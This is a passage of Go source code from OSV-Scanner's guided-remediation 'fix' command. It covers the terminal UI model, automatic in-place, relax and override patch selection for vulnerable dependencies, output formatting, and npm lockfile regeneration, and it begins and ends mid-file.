lockfileGraph *resolve.Graph termWidth int // width of the whole terminal termHeight int // height of the whole terminal mainViewWidth int // width of the main view mainViewHeight int // height of the main view mainViewStyle lipgloss.Style // border style to render the main view infoViewWidth int // width of the secondary info view infoViewHeight int // height of the info view infoViewStyle lipgloss.Style // border style to render the info view help help.Model // help text renderer st modelState // current state of program err error // set if a fatal error occurs within the program writing bool // whether the model is currently shelling out writing lockfile/manifest file inPlaceResult *remediation.InPlaceResult // results & patches from minimal / in-place resolution relockBaseRes *resolution.Result // Base relock result, matching the current manifest on disk relockBaseResErrs []resolution.NodeError // Errors in base relock result } func newModel(ctx context.Context, opts osvFixOptions, cl client.ResolutionClient) model { mainViewStyle := lipgloss.NewStyle(). BorderStyle(lipgloss.RoundedBorder()). Padding(tui.ViewVPad, tui.ViewHPad) infoViewStyle := lipgloss.NewStyle(). BorderStyle(lipgloss.RoundedBorder()). Padding(tui.ViewVPad, tui.ViewHPad) m := model{ ctx: ctx, options: opts, cl: cl, st: &stateInitialize{}, mainViewStyle: mainViewStyle, infoViewStyle: infoViewStyle, help: help.New(), } w, h, err := term.GetSize(int(os.Stdout.Fd())) if err != nil { panic(err) } m.setTermSize(w, h) return m } func (m *model) setTermSize(w, h int) { m.termWidth = w m.termHeight = h // The internal rendering space of the views occupy a percentage of the terminal width viewWidth := max(int(float64(w)*tui.ViewWidthPct), tui.ViewMinWidth) // The internal height is constant viewHeight := tui.ViewMinHeight // The total width/height, including the whitespace padding and border characters on each side paddedWidth := viewWidth + 2*tui.ViewHPad + 2 paddedHeight := viewHeight + 2*tui.ViewVPad + 2 // resize the views to the calculated dimensions m.mainViewWidth = viewWidth m.mainViewHeight = viewHeight m.mainViewStyle = m.mainViewStyle.Width(paddedWidth).Height(paddedHeight) m.infoViewWidth = viewWidth m.infoViewHeight = viewHeight m.infoViewStyle = m.infoViewStyle.Width(paddedWidth).Height(paddedHeight) m.st.Resize(m.mainViewWidth, m.mainViewHeight) m.st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) } func (m *model) getBorderStyles() (lipgloss.Style, lipgloss.Style) { if m.st.IsInfoFocused() { m.infoViewStyle = m.infoViewStyle.UnsetBorderForeground() m.mainViewStyle = m.mainViewStyle.BorderForeground(tui.ColorDisabled) } else { m.infoViewStyle = m.infoViewStyle.BorderForeground(tui.ColorDisabled) m.mainViewStyle = m.mainViewStyle.UnsetBorderForeground() } return m.mainViewStyle, m.infoViewStyle } // TODO: Handle all errors better, instead of just quitting on any error func errorAndExit(m model, err error) (tea.Model, tea.Cmd) { m.err = err return m, tea.Quit } func (m model) Init() tea.Cmd { return m.st.Init(m) } func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) { switch msg := msg.(type) { case tea.KeyPressMsg: switch { case msg.String() == "ctrl+c": // always quit on ctrl+c return m, tea.Quit case key.Matches(msg, tui.Keys.Help): // toggle help m.help.ShowAll = !m.help.ShowAll } case tea.WindowSizeMsg: m.setTermSize(msg.Width, msg.Height) } return m.st.Update(m, msg) } func (m model) View() tea.View { // render both views side-by-side mainStyle, infoStyle := m.getBorderStyles() mainView := mainStyle.Render(m.st.View(m)) infoView := infoStyle.Render(m.st.InfoView()) view := lipgloss.JoinHorizontal(lipgloss.Top, mainView, infoView) // If we can't fit both side-by-side, only render the focused view if lipgloss.Width(view) > m.termWidth { if m.st.IsInfoFocused() { view = infoView } else { view = mainView } } // add the help to the bottom view = lipgloss.JoinVertical(lipgloss.Center, view, m.help.View(tui.Keys)) v := tea.NewView(lipgloss.Place(m.termWidth, m.termHeight, lipgloss.Center, lipgloss.Center, view)) v.AltScreen = true return v } type modelState interface { Init(m model) tea.Cmd Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) View(m model) string Resize(w, h int) InfoView() string ResizeInfo(w, h int) IsInfoFocused() bool } type inPlaceResolutionMsg struct { res remediation.InPlaceResult g *resolve.Graph err error } func doInPlaceResolution(ctx context.Context, cl client.ResolutionClient, opts osvFixOptions) tea.Msg { lf, err := depfile.OpenLocalDepFile(opts.Lockfile) if err != nil { return inPlaceResolutionMsg{err: err} } defer lf.Close() g, err := opts.LockfileRW.Read(lf) if err != nil { return inPlaceResolutionMsg{err: err} } res, err := remediation.ComputeInPlacePatches(ctx, cl, g, opts.Options) return inPlaceResolutionMsg{res, g, err} } type doRelockMsg struct { res *resolution.Result err error } func doRelock(ctx context.Context, cl client.ResolutionClient, m manif.Manifest, opts resolution.ResolveOpts, matchFn func(resolution.Vulnerability) bool) tea.Msg { res, err := resolution.Resolve(ctx, cl, m, opts) if err != nil { return doRelockMsg{nil, err} } if err := cl.WriteCache(m.FilePath); err != nil { return doRelockMsg{nil, err} } res.FilterVulns(matchFn) return doRelockMsg{res, nil} } func doInitialRelock(ctx context.Context, opts osvFixOptions) tea.Msg { f, err := depfile.OpenLocalDepFile(opts.Manifest) if err != nil { return doRelockMsg{err: err} } defer f.Close() m, err := opts.ManifestRW.Read(f) if err != nil { return doRelockMsg{err: err} } client.PreFetch(ctx, opts.Client, m.Requirements, m.FilePath) return doRelock(ctx, opts.Client, m, opts.ResolveOpts, opts.MatchVuln) } // tui.ViewModel for showing non-interactive strings type infoStringView string func (s infoStringView) Update(tea.Msg) (tui.ViewModel, tea.Cmd) { return s, nil } func (s infoStringView) View() string { return string(s) } func (s infoStringView) Resize(int, int) {} var emptyInfoView = infoStringView("") func resolutionErrorView(res *resolution.Result, errs []resolution.NodeError) tui.ViewModel { if len(errs) == 0 { return emptyInfoView } s := strings.Builder{} s.WriteString("The following errors were encountered during resolution which may impact results:\n") for _, e := range errs { node := res.Graph.Nodes[e.NodeID] fmt.Fprintf(&s, "Error when resolving %s@%s:\n", node.Version.Name, node.Version.Version) req := e.Error.Req if strings.Contains(req.Version, ":") { // this will be the case with unsupported npm requirements e.g. `file:...`, `git+https://...` // TODO: don't rely on resolution to propagate these errors // No easy access to the `knownAs` field to find which package this corresponds to fmt.Fprintf(&s, "\tSkipped resolving unsupported version specification: %s\n", req.Version) } else { fmt.Fprintf(&s, "\t%v: %s@%s\n", e.Error.Error, req.Name, req.Version) } } return infoStringView(s.String()) } type writeMsg struct { err error } ================================================ FILE: cmd/osv-scanner/fix/noninteractive.go ================================================ package fix import ( "cmp" "context" "errors" "fmt" "maps" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/depfile" lf "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" ) func autoInPlace(ctx context.Context, opts osvFixOptions, maxUpgrades int) error { if !remediation.SupportsInPlace(opts.LockfileRW) { return fmt.Errorf("%s strategy is not supported for lockfile", strategyInPlace) } cmdlogger.Infof("Scanning %s...", opts.Lockfile) var outputResult fixOutput outputResult.Path = opts.Lockfile outputResult.Ecosystem = util.OSVEcosystem[opts.LockfileRW.System()] outputResult.Strategy = strategyInPlace f, err := depfile.OpenLocalDepFile(opts.Lockfile) if err != nil { return err } g, err := opts.LockfileRW.Read(f) f.Close() if err != nil { return err } res, err := remediation.ComputeInPlacePatches(ctx, opts.Client, g, opts.Options) if err != nil { return err } patches := autoChooseInPlacePatches(res, maxUpgrades, &outputResult) if err := printResult(outputResult, opts); err != nil { cmdlogger.Errorf("failed writing output") return err } cmdlogger.Infof("Rewriting %s...", opts.Lockfile) return lf.Overwrite(opts.LockfileRW, opts.Lockfile, patches) } // returns the top {maxUpgrades} compatible patches, and populates outputResult. // if maxUpgrades is < 0, do as many patches as possible func autoChooseInPlacePatches(res remediation.InPlaceResult, maxUpgrades int, outputResult *fixOutput) []lf.DependencyPatch { // Keep track of the VersionKeys we've already patched so we know which patches are incompatible seenVKs := make(map[resolve.VersionKey]bool) uniqueVulns := make(map[packageOutput]struct{}) var patches []lf.DependencyPatch for _, p := range res.Patches { vk := resolve.VersionKey{ PackageKey: p.Pkg, Version: p.OrigVersion, } // add each of the resolved vulnKeys to the set of unique vulns for _, rv := range p.ResolvedVulns { p := packageOutput{Name: vk.Name, Version: vk.Version} if _, ok := uniqueVulns[p]; ok { continue } uniqueVulns[p] = struct{}{} outputResult.Vulnerabilities = append(outputResult.Vulnerabilities, vulnOutput{ ID: rv.OSV.GetId(), Packages: []packageOutput{p}, Unactionable: false, }) } // If we still are picking more patches, and we haven't already patched this specific version, // then add this patch to our final set of patches and count the vulnerabilities if maxUpgrades != 0 && !seenVKs[vk] { seenVKs[vk] = true patches = append(patches, p.DependencyPatch) maxUpgrades-- vulns := make([]vulnOutput, len(p.ResolvedVulns)) for i, v := range p.ResolvedVulns { vulns[i].ID = v.OSV.GetId() vulns[i].Packages = []packageOutput{{Name: p.Pkg.Name, Version: p.OrigVersion}} vulns[i].Unactionable = false } sortVulns(vulns) outputResult.Patches = append(outputResult.Patches, patchOutput{ PackageUpdates: []updatePackageOutput{{Name: p.Pkg.Name, VersionFrom: p.OrigVersion, VersionTo: p.NewVersion, Transitive: true}}, Fixed: vulns, }) } } // Add unactionable vulns to output for _, vuln := range res.Unfixable { v := makeResultVuln(vuln) v.Unactionable = true outputResult.Vulnerabilities = append(outputResult.Vulnerabilities, v) } sortVulns(outputResult.Vulnerabilities) return patches } func autoRelax(ctx context.Context, opts osvFixOptions, maxUpgrades int) error { if !remediation.SupportsRelax(opts.ManifestRW) { return fmt.Errorf("%s strategy is not supported for manifest", strategyRelax) } cmdlogger.Infof("Resolving %s...", opts.Manifest) var outputResult fixOutput outputResult.Path = opts.Manifest outputResult.Ecosystem = util.OSVEcosystem[opts.ManifestRW.System()] outputResult.Strategy = strategyRelax f, err := depfile.OpenLocalDepFile(opts.Manifest) if err != nil { return err } manif, err := opts.ManifestRW.Read(f) f.Close() if err != nil { return err } client.PreFetch(ctx, opts.Client, manif.Requirements, manif.FilePath) res, err := resolution.Resolve(ctx, opts.Client, manif, opts.ResolveOpts) if err != nil { return err } res.FilterVulns(opts.MatchVuln) // TODO: count vulnerabilities per unique version as scan action does allPatches, err := remediation.ComputeRelaxPatches(ctx, opts.Client, res, opts.Options) if err != nil { return err } if opts.NoIntroduce { allPatches = removeVulnIntroducingPatches(allPatches) } populateResultVulns(&outputResult, res, allPatches) if err := opts.Client.WriteCache(manif.FilePath); err != nil { cmdlogger.Warnf("WARNING: failed to write resolution cache: %v", err) } depPatches := autoChooseRelaxPatches(allPatches, maxUpgrades, &outputResult) if err := printResult(outputResult, opts); err != nil { cmdlogger.Errorf("failed writing output") return err } if len(depPatches) == 0 { return nil } cmdlogger.Infof("Rewriting %s...", opts.Manifest) if err := manifest.Overwrite(opts.ManifestRW, opts.Manifest, manifest.Patch{Manifest: &manif, Deps: depPatches}); err != nil { return err } if opts.Lockfile != "" { // We only recreate the lockfile if we know a lockfile already exists // or we've been given a command to run. cmdlogger.Infof("Shelling out to regenerate lockfile...") cmd, err := regenerateLockfileCmd(ctx, opts) if err != nil { return err } cmd.Stdout = opts.Stdout cmd.Stderr = opts.Stderr cmdlogger.Infof("Executing `%s`...", cmd) err = cmd.Run() if err == nil { return nil } cmdlogger.Warnf("Install failed. Trying again with `--legacy-peer-deps`...") cmd, err = regenerateLockfileCmd(ctx, opts) if err != nil { return err } cmd.Args = append(cmd.Args, "--legacy-peer-deps") cmd.Stdout = opts.Stdout cmd.Stderr = opts.Stderr return cmd.Run() } return nil } // returns the top {maxUpgrades} compatible patches, and populates outputResult // if maxUpgrades is < 0, do as many patches as possible func autoChooseRelaxPatches(diffs []resolution.Difference, maxUpgrades int, outputResult *fixOutput) []manifest.DependencyPatch { var patches []manifest.DependencyPatch pkgChanged := make(map[resolve.VersionKey]bool) // dependencies we've already applied a patch to for _, diff := range diffs { // If we are not picking any more patches, or this patch is incompatible with existing patches, skip adding it to the patch list. // A patch is incompatible if any of its changed packages have already been changed by an existing patch. if maxUpgrades == 0 || slices.ContainsFunc(diff.Deps, func(dp manifest.DependencyPatch) bool { return pkgChanged[resolve.VersionKey{PackageKey: dp.Pkg, Version: dp.OrigRequire}] }) { continue } var p patchOutput // Add all individual package patches to the final patch list, and add the vulns this is anticipated to resolve for _, dp := range diff.Deps { patches = append(patches, dp) pkgChanged[resolve.VersionKey{PackageKey: dp.Pkg, Version: dp.OrigRequire}] = true p.PackageUpdates = append(p.PackageUpdates, updatePackageOutput{ Name: dp.Pkg.Name, VersionFrom: dp.OrigRequire, VersionTo: dp.NewRequire, Transitive: false, }) } for _, vuln := range diff.RemovedVulns { p.Fixed = append(p.Fixed, makeResultVuln(vuln)) } sortVulns(p.Fixed) for _, v := range diff.AddedVulns { p.Introduced = append(p.Introduced, makeResultVuln(v)) } sortVulns(p.Introduced) outputResult.Patches = append(outputResult.Patches, p) maxUpgrades-- } return patches } func autoOverride(ctx context.Context, opts osvFixOptions, maxUpgrades int) error { if !remediation.SupportsOverride(opts.ManifestRW) { return errors.New("override strategy is not supported for manifest") } cmdlogger.Infof("Resolving %s...", opts.Manifest) var outputResult fixOutput outputResult.Path = opts.Manifest outputResult.Ecosystem = util.OSVEcosystem[opts.ManifestRW.System()] outputResult.Strategy = strategyOverride f, err := depfile.OpenLocalDepFile(opts.Manifest) if err != nil { return err } manif, err := opts.ManifestRW.Read(f) f.Close() if err != nil { return err } if opts.ManifestRW.System() == resolve.Maven { // Update Maven registries based on the repositories defined in pom.xml, // as well as the repositories merged from parent pom.xml. // TODO: add registries defined in settings.xml // https://github.com/google/osv-scanner/issues/1269 specific, ok := manif.EcosystemSpecific.(manifest.MavenManifestSpecific) if ok { registries := make([]client.Registry, len(specific.Repositories)) for i, repo := range specific.Repositories { registries[i] = datasource.MavenRegistry{ URL: string(repo.URL), ID: string(repo.ID), ReleasesEnabled: repo.Releases.Enabled.Boolean(), SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(), } } if err := opts.Client.AddRegistries(registries); err != nil { return err } } } client.PreFetch(ctx, opts.Client, manif.Requirements, manif.FilePath) res, err := resolution.Resolve(ctx, opts.Client, manif, opts.ResolveOpts) if err != nil { return err } res.FilterVulns(opts.MatchVuln) // TODO: count vulnerabilities per unique version as scan action does allPatches, err := remediation.ComputeOverridePatches(ctx, opts.Client, res, opts.Options) if err != nil { return err } if opts.NoIntroduce { allPatches = removeVulnIntroducingPatches(allPatches) } populateResultVulns(&outputResult, res, allPatches) if err := opts.Client.WriteCache(manif.FilePath); err != nil { cmdlogger.Warnf("WARNING: failed to write resolution cache: %v", err) } depPatches := autoChooseOverridePatches(allPatches, maxUpgrades, &outputResult) if err := printResult(outputResult, opts); err != nil { cmdlogger.Errorf("failed writing output") return err } if len(depPatches) == 0 { return nil } cmdlogger.Infof("Rewriting %s...", opts.Manifest) if err := manifest.Overwrite(opts.ManifestRW, opts.Manifest, manifest.Patch{Manifest: &manif, Deps: depPatches}); err != nil { return err } return nil } func autoChooseOverridePatches(diffs []resolution.Difference, maxUpgrades int, outputResult *fixOutput) []manifest.DependencyPatch { if maxUpgrades == 0 { return nil } var patches []manifest.DependencyPatch pkgChanged := make(map[resolve.PackageKey]bool) // dependencies we've already applied a patch to fixedVulns := make(map[string]struct{}) // vulns that have already been fixed by a patch for _, diff := range diffs { // If this patch is incompatible with existing patches, skip adding it to the patch list. // A patch is incompatible if any of its changed packages have already been changed by an existing patch. if slices.ContainsFunc(diff.Deps, func(dp manifest.DependencyPatch) bool { return pkgChanged[dp.Pkg] }) { continue } // A patch is also incompatible if any fixed vulnerability has already been fixed by another patch. // This would happen if updating the version of one package has a side effect of also updating or removing one of its vulnerable dependencies. // e.g. We have {foo@1 -> bar@1}, and two possible patches [foo@3, bar@2]. // Patching foo@3 makes {foo@3 -> bar@3}, which also fixes the vulnerability in bar. // Applying both patches would force {foo@3 -> bar@2}, which is less desirable. if slices.ContainsFunc(diff.RemovedVulns, func(rv resolution.Vulnerability) bool { _, ok := fixedVulns[rv.OSV.GetId()]; return ok }) { continue } var p patchOutput // Add all individual package patches to the final patch list, and track the vulns this is anticipated to fix. for _, dp := range diff.Deps { patches = append(patches, dp) pkgChanged[dp.Pkg] = true pkgUpdate := updatePackageOutput{ Name: dp.Pkg.Name, VersionFrom: dp.OrigResolved, VersionTo: dp.NewRequire, Transitive: true, } // Check if this is a direct dependency for _, req := range diff.Original.Manifest.Requirements { if req.PackageKey == dp.Pkg && !req.Type.HasAttr(dep.MavenDependencyOrigin) { pkgUpdate.Transitive = false break } } p.PackageUpdates = append(p.PackageUpdates, pkgUpdate) } for _, vuln := range diff.RemovedVulns { fixedVulns[vuln.OSV.GetId()] = struct{}{} p.Fixed = append(p.Fixed, makeResultVuln(vuln)) } sortVulns(p.Fixed) for _, vuln := range diff.AddedVulns { p.Introduced = append(p.Introduced, makeResultVuln(vuln)) } sortVulns(p.Introduced) outputResult.Patches = append(outputResult.Patches, p) maxUpgrades-- if maxUpgrades == 0 { break } } return patches } func sortVulns(vulns []vulnOutput) { slices.SortFunc(vulns, func(a, b vulnOutput) int { return identifiers.IDSortFunc(a.ID, b.ID) }) } func makeResultVuln(vuln resolution.Vulnerability) vulnOutput { v := vulnOutput{ ID: vuln.OSV.GetId(), } affected := make(map[packageOutput]struct{}) for _, sg := range vuln.Subgraphs { vk := sg.Nodes[sg.Dependency].Version affected[packageOutput{Name: vk.Name, Version: vk.Version}] = struct{}{} } v.Packages = slices.AppendSeq(make([]packageOutput, 0, len(affected)), maps.Keys(affected)) slices.SortFunc(v.Packages, func(a, b packageOutput) int { if c := cmp.Compare(a.Name, b.Name); c != 0 { return c } return cmp.Compare(a.Version, b.Version) }) return v } func populateResultVulns(outputResult *fixOutput, res *resolution.Result, allPatches []resolution.Difference) { // Resolution errors for _, err := range res.Errors() { node := res.Graph.Nodes[err.NodeID] outputResult.Errors = append(outputResult.Errors, errorOutput{ Package: packageOutput{ Name: node.Version.Name, Version: node.Version.Version, }, Requirement: packageOutput{ Name: err.Error.Req.Name, Version: err.Error.Req.Version, }, Error: err.Error.Error, }) } // Vulnerabilities vulns := make(map[string]vulnOutput, len(res.Vulns)) outputResult.Vulnerabilities = make([]vulnOutput, len(res.Vulns)) for _, vuln := range res.Vulns { v := makeResultVuln(vuln) v.Unactionable = true vulns[v.ID] = v } // Determine if vulnerabilities are actionable for _, p := range allPatches { for _, vuln := range p.RemovedVulns { if v, ok := vulns[vuln.OSV.GetId()]; ok { v.Unactionable = false vulns[vuln.OSV.GetId()] = v } } } outputResult.Vulnerabilities = slices.Collect(maps.Values(vulns)) sortVulns(outputResult.Vulnerabilities) } func removeVulnIntroducingPatches(patches []resolution.Difference) []resolution.Difference { return slices.DeleteFunc(patches, func(diff resolution.Difference) bool { return len(diff.AddedVulns) > 0 }) } ================================================ FILE: cmd/osv-scanner/fix/output.go ================================================ package fix import ( "encoding/json" "io" "slices" "strings" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) // fixOutput is a description of changes made by guided remediation to a manifest/lockfile. type fixOutput struct { Path string `json:"path"` // path to the manifest/lockfile. Ecosystem osvconstants.Ecosystem `json:"ecosystem"` // the OSV ecosystem of the file (npm, Maven) Strategy strategy `json:"strategy"` // the remediation strategy that was used. Vulnerabilities []vulnOutput `json:"vulnerabilities"` // vulns detected in the initial manifest/lockfile. Patches []patchOutput `json:"patches"` // list of dependency patches that were applied. Errors []errorOutput `json:"errors,omitempty"` // non-fatal errors encountered in initial resolution. } // vulnOutput represents a vulnerability that was found in a project. type vulnOutput struct { ID string `json:"id"` // the OSV ID of the vulnerability. Packages []packageOutput `json:"packages"` // the list of packages in the dependency graph this vuln affects. Unactionable bool `json:"unactionable,omitempty"` // true if no fix patch available, or if constraints would prevent one. } // patchOutput represents an isolated patch to one or more dependencies that fixes one or more vulns. type patchOutput struct { PackageUpdates []updatePackageOutput `json:"packageUpdates"` // dependencies that were updated. Fixed []vulnOutput `json:"fixed"` // vulns fixed by this patch. Introduced []vulnOutput `json:"introduced,omitempty"` // vulns introduced by this patch. } // packageOutput represents a package that was found in a project. type packageOutput struct { Name string `json:"name"` // name of the dependency. Version string `json:"version"` // version of the dependency in the graph. } // updatePackageOutput represents a package that was updated by a patch. type updatePackageOutput struct { Name string `json:"name"` // name of dependency being updated. VersionFrom string `json:"versionFrom"` // version of the dependency before the patch. VersionTo string `json:"versionTo"` // version of the dependency after the patch. Transitive bool `json:"transitive"` // false if this package is a direct dependency, true if indirect. } // errorOutput represents an error encountered during the initial resolution of the dependency graph. type errorOutput struct { Package packageOutput `json:"package"` // the package that caused the error. Requirement packageOutput `json:"requirement"` // the requirement of the package that errored. Error string `json:"error"` // the error string. // e.g. // errorOutput{ // Package: affectedPackage{"foo", "1.2.3"}, // Requirement: affectedPackage{"bar", ">2.0.0"}, // Error: "could not find a version that satisfies requirement >2.0.0 for package bar", // } } func printResult(outputResult fixOutput, opts osvFixOptions) error { if opts.OutputJSON { return outputJSON(opts.Stdout, outputResult) } return outputText(opts.Stdout, outputResult) } func outputText(_ io.Writer, out fixOutput) error { if len(out.Errors) > 0 { cmdlogger.Warnf("WARNING: encountered %d errors during dependency resolution:", len(out.Errors)) for _, err := range out.Errors { cmdlogger.Errorf("Error when resolving %s@%s:", err.Package.Name, err.Package.Version) if strings.Contains(err.Requirement.Version, ":") { // this will be the case with unsupported npm requirements e.g. `file:...`, `git+https://...` // TODO: don't rely on resolution to propagate these errors // No easy access to the `knownAs` field to find which package this corresponds to cmdlogger.Errorf("\tSkipped resolving unsupported version specification: %s", err.Requirement.Version) } else { cmdlogger.Errorf("\t%v: %s@%s", err.Error, err.Requirement.Name, err.Requirement.Version) } } } nVulns := len(out.Vulnerabilities) cmdlogger.Infof("Found %d vulnerabilities matching the filter", nVulns) if len(out.Patches) == 0 { cmdlogger.Infof("No dependency patches are possible") cmdlogger.Infof("REMAINING-VULNS: %d", nVulns) cmdlogger.Infof("UNFIXABLE-VULNS: %d", nVulns) return nil } changedDeps := 0 var fixedVulns []string for _, patch := range out.Patches { changedDeps += len(patch.PackageUpdates) for _, v := range patch.Fixed { fixedVulns = append(fixedVulns, v.ID) } } if out.Strategy == strategyOverride { cmdlogger.Infof("Can fix %d/%d matching vulnerabilities by overriding %d dependencies", len(fixedVulns), nVulns, changedDeps) for _, patch := range out.Patches { for _, pkg := range patch.PackageUpdates { cmdlogger.Infof("OVERRIDE-PACKAGE: %s,%s", pkg.Name, pkg.VersionTo) } } } else { cmdlogger.Infof("Can fix %d/%d matching vulnerabilities by changing %d dependencies", len(fixedVulns), nVulns, changedDeps) for _, patch := range out.Patches { for _, pkg := range patch.PackageUpdates { cmdlogger.Infof("UPGRADED-PACKAGE: %s,%s,%s", pkg.Name, pkg.VersionFrom, pkg.VersionTo) } } } slices.Sort(fixedVulns) cmdlogger.Infof("FIXED-VULN-IDS: %s", strings.Join(fixedVulns, ",")) cmdlogger.Infof("REMAINING-VULNS: %d", nVulns-len(fixedVulns)) nUnfixable := 0 for _, v := range out.Vulnerabilities { if v.Unactionable { nUnfixable++ } } cmdlogger.Infof("UNFIXABLE-VULNS: %d", nUnfixable) return nil } func outputJSON(w io.Writer, out fixOutput) error { encoder := json.NewEncoder(w) encoder.SetIndent("", " ") return encoder.Encode(out) } ================================================ FILE: cmd/osv-scanner/fix/regen_lockfile.go ================================================ package fix import ( "context" "os" "os/exec" "path/filepath" ) func regenerateLockfileCmd(ctx context.Context, opts osvFixOptions) (*exec.Cmd, error) { // TODO: this is npm-specific and hacky // delete existing package-lock & node_modules directory to force npm to do a clean install dir := filepath.Dir(opts.Manifest) if err := os.RemoveAll(filepath.Join(dir, "package-lock.json")); err != nil { return nil, err } if err := os.RemoveAll(filepath.Join(dir, "node_modules")); err != nil { return nil, err } // TODO: need to also remove node_modules/ in workspace packages c := exec.CommandContext(ctx, "npm", "install", "--package-lock-only", "--ignore-scripts") c.Dir = dir return c, nil } ================================================ FILE: cmd/osv-scanner/fix/state-choose-in-place-patches.go ================================================ package fix import ( "fmt" "slices" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/table" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/tui" ) type stateChooseInPlacePatches struct { stateInPlace *stateInPlaceResult table table.Model // in-place table to render patchIdx []int // for each flattened patch, its index into unflattened patches vulnsInfos []tui.ViewModel // vulns info views corresponding to each flattened patch focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused viewWidth int // width for rendering (same as model.mainViewWidth) } func (st *stateChooseInPlacePatches) Init(m model) tea.Cmd { // pre-computation of flattened patches and vulns for idx, p := range m.inPlaceResult.Patches { for i := range p.ResolvedVulns { st.patchIdx = append(st.patchIdx, idx) st.vulnsInfos = append(st.vulnsInfos, tui.NewVulnInfo(&p.ResolvedVulns[i])) } } // grab the table out of the InPlaceInfo, so it looks consistent // TODO: Re-use this in a less hacky way st.table = tui.NewInPlaceInfo(*m.inPlaceResult).Model // insert the select/deselect all row, and a placeholder row for the 'done' line r := st.table.Rows() r = slices.Insert(r, 0, table.Row{"", "", ""}) r = append(r, table.Row{"", "", ""}) st.table.SetRows(r) st.updateTableRows(m) st.Resize(m.mainViewWidth, m.mainViewHeight) st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) return nil } func (st *stateChooseInPlacePatches) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmd tea.Cmd if msg, ok := msg.(tea.KeyPressMsg); ok { switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil st.table.Focus() } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view st.table.Blur() // ignore key presses when the info view is focused } case st.IsInfoFocused(): st.focusedInfo, cmd = st.focusedInfo.Update(msg) // VulnInfo returns nil as the model when it wants to exit, instead of the CloseViewModel Cmd // if it quits, we need to re-focus the table if st.focusedInfo == nil { st.table.Focus() } case key.Matches(msg, tui.Keys.Quit): // go back to in-place results m.st = st.stateInPlace return m, nil case key.Matches(msg, tui.Keys.Select): if st.table.Cursor() == len(st.table.Rows())-1 { // hit enter on done line // go back to in-place results m.st = st.stateInPlace return m, nil } if st.table.Cursor() == 0 { // select/deselect all // if nothing is selected, set everything to true, otherwise set everything to false selection := !slices.Contains(st.stateInPlace.selectedChanges, true) for i := range st.stateInPlace.selectedChanges { st.stateInPlace.selectedChanges[i] = selection } } else { st.toggleSelection(st.table.Cursor() - 1) } st.updateTableRows(m) } } // update the table t, c := st.table.Update(msg) st.table = t return m, tea.Batch(cmd, c) } func (st *stateChooseInPlacePatches) View(_ model) string { tableStr := lipgloss.PlaceHorizontal(st.viewWidth, lipgloss.Center, st.table.View()) return lipgloss.JoinVertical(lipgloss.Left, tableStr, tui.RenderSelectorOption(st.table.Cursor() == len(st.table.Rows())-1, " > ", "%s", "Done"), ) } func (st *stateChooseInPlacePatches) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateChooseInPlacePatches) updateTableRows(m model) { // update the checkbox for each row rows := st.table.Rows() anySelected := false for i, pIdx := range st.patchIdx { // don't render a checkbox on the empty lines if rows[i+1][0] == "" { continue } var checkBox string if st.stateInPlace.selectedChanges[pIdx] { checkBox = "[x]" anySelected = true } else { checkBox = "[ ]" } rows[i+1][0] = fmt.Sprintf("%s %s", checkBox, m.inPlaceResult.Patches[pIdx].Pkg.Name) } // show select all only if nothing is selected, // show deselect all if anything is selected if anySelected { rows[0][0] = "DESELECT ALL" } else { rows[0][0] = "SELECT ALL" } st.table.SetRows(rows) // there is no table.Columns() method, so I can't resize the columns to fit the checkbox properly :( } func (st *stateChooseInPlacePatches) toggleSelection(idx int) { // TODO: Prevent selection of multiple (incompatible) patches for same package version i := st.patchIdx[idx] st.stateInPlace.selectedChanges[i] = !st.stateInPlace.selectedChanges[i] } func (st *stateChooseInPlacePatches) currentInfoView() (view tui.ViewModel, canFocus bool) { if c := st.table.Cursor(); c > 0 && c < len(st.table.Rows())-1 { return st.vulnsInfos[c-1], true } return emptyInfoView, false } func (st *stateChooseInPlacePatches) Resize(w, h int) { st.viewWidth = w st.table.SetWidth(w) st.table.SetHeight(h - 1) // -1 to account for 'Done' line at bottom } func (st *stateChooseInPlacePatches) ResizeInfo(w, h int) { for _, info := range st.vulnsInfos { info.Resize(w, h) } } func (st *stateChooseInPlacePatches) IsInfoFocused() bool { return st.focusedInfo != nil } ================================================ FILE: cmd/osv-scanner/fix/state-choose-strategy.go ================================================ package fix import ( "fmt" "slices" "strconv" "strings" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/textinput" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/tui" ) type stateChooseStrategy struct { cursorPos int // TODO: use an enum canRelock bool vulnList tui.ViewModel inPlaceInfo tui.ViewModel relockFixVulns tui.ViewModel errorsView tui.ViewModel depthInput textinput.Model severityInput textinput.Model focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused } const ( stateChooseInfo = iota stateChooseErrors stateChooseInPlace stateChooseRelock stateChooseDepth stateChooseSeverity stateChooseDev stateChooseApplyCriteria stateChooseQuit stateChooseEnd ) func (st *stateChooseStrategy) Init(m model) tea.Cmd { st.cursorPos = stateChooseInPlace // pre-generate the info views for each option // make a slice of vuln pointers for the all vulnerabilities list // TODO: be consistent & efficient with how we pass resolution.Vulnerabilities around var allVulns []*resolution.Vulnerability for _, p := range m.inPlaceResult.Patches { for i := 